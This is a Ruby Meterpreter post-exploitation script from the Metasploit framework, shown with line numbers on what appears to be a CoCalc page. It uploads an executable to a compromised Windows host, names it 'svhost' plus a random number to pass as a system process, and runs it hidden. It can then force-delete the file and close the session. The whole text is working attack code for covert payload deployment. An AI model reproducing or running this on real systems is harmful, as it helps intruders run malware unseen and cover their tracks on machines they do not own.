CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
session = client
9
@@exec_opts = Rex::Parser::Arguments.new(
10
  "-h" => [ false,"Help menu." ],
11
  "-e" => [ true, "Executable or script to upload to target host." ],
12
  "-o" => [ true, "Options for executable." ],
13
  "-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
14
  "-x" => [ false,"Exit the session once the payload has been run." ],
15
  "-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
16
  "-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
17
  "-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
18
)
19

20
################## function declaration Declarations ##################
21
def usage()
22
  print_line "UploadExec -- upload a script or executable and run it"
23
  print_line(@@exec_opts.usage)
24
  raise Rex::Script::Completed
25
end
26

27
def upload(session,file,trgloc = "")
28
  if not ::File.exist?(file)
29
    raise "File to Upload does not exist!"
30
  else
31
    if trgloc == ""
32
    location = session.sys.config.getenv('TEMP')
33
    else
34
      location = trgloc
35
    end
36
    begin
37
      ext = file[file.rindex(".") .. -1]
38
      if ext and ext.downcase == ".exe"
39
        fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
40
      else
41
        fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
42
      end
43
      print_status("\tUploading #{file}....")
44
      session.fs.file.upload_file("#{fileontrgt}","#{file}")
45
      print_status("\t#{file} uploaded!")
46
      print_status("\tUploaded as #{fileontrgt}")
47
    rescue ::Exception => e
48
      print_status("Error uploading file #{file}: #{e.class} #{e}")
49
      raise e
50
    end
51
  end
52
  return fileontrgt
53
end
54

55
#Function for executing a list of commands
56
def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
57
  r=''
58
  session.response_timeout=120
59
  if verbose == 1
60
    begin
61
      print_status "\tRunning command #{cmdexe}"
62
      r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
63
      while(d = r.channel.read)
64
        print_status("\t#{d}")
65
      end
66
      r.channel.close
67
      r.close
68
    rescue ::Exception => e
69
      print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
70
      raise e
71
    end
72
  else
73
    begin
74
      print_status "\trunning command #{cmdexe}"
75
      r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
76
      r.close
77
    rescue ::Exception => e
78
      print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
79
      raise e
80
    end
81
  end
82
end
83

84
def m_unlink(session, path)
85
  r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
86
  while(r.name)
87
    select(nil, nil, nil, 0.10)
88
  end
89
  r.close
90
end
91
#check for proper Meterpreter Platform
92
def unsupported
93
  print_error("This version of Meterpreter is not supported with this Script!")
94
  raise Rex::Script::Completed
95
end
96
unsupported if client.platform != 'windows'
97
#parsing of Options
98
file = ""
99
cmdopt = nil
100
helpcall = 0
101
path = ""
102
verbose = 0
103
remove = 0
104
quit = 0
105
sleep_sec = nil
106
@@exec_opts.parse(args) { |opt, idx, val|
107
  case opt
108
  when "-e"
109
    file = val || ""
110
  when "-o"
111
    cmdopt = val
112
  when "-p"
113
    path = val
114
  when "-v"
115
    verbose = 1
116
  when "-h"
117
    helpcall = 1
118
  when "-s"
119
    sleep_sec = val.to_f
120
  when "-r"
121
    remove = 1
122
  when "-x"
123
    quit = 1
124
  end
125

126
}
127

128
if args.length == 0 || helpcall == 1
129
  usage
130
end
131
print_status("Running Upload and Execute Meterpreter script....")
132
exec = upload(session,file,path)
133
if sleep_sec
134
  print_status("\tSleeping for #{sleep_sec}s...")
135
  Rex.sleep(sleep_sec)
136
end
137
cmd_on_trgt_exec(session,exec,cmdopt,verbose)
138
if remove == 1
139
  print_status("\tDeleting #{exec}")
140
  m_unlink(session, exec)
141
end
142

143
if quit == 1
144
  print_status("Closing the session...")
145
  session.core.shutdown rescue nil
146
  session.shutdown_passive_dispatcher
147
end
148

149
print_status("Finished!")
150

151